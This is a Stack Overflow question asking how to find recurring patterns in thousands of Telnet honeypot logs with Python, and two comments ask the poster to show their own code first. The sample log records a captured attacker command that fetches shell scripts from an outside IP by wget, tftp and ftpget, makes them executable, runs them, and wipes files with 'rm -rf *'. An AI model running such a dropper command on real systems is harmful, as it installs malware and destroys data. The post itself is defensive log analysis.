# analysing log files of honeypots

Tags: logfile, honeypot

```
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:08]: New Telnet session established!

[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:42]: rsh
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.25/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.25 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.25; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.25 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: ./ebs
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>HP_Exec: /sbin/lsmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/rm
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>HP_Error: -22
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /bin/rm
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:49]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:49]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:57]: Session end!
```

I have thousands of log files like this and i want to identify the pattern among these as most of the commands used are same in all log files please let me know how to proceed or what methods to use in python??

Comment: Welcome to Stack Overflow.  You should post here your attempt first. We will be happy to help if it does not work, but we do not write code or tutorials for you. You should attempt it yourself first.

Comment: Welcome to StackOverflow. This is not a free code fabric. Please show what have you done so far. What code have you tried. Format your question as well as you can, for example add the correct punctuation, in order to make it readable. We are glad to help you, but you are not allowed to abuse the time of other users. Please also read [Asking](https://stackoverflow.com/help/asking) and [How do I ask a good question](https://stackoverflow.com/help/how-to-ask).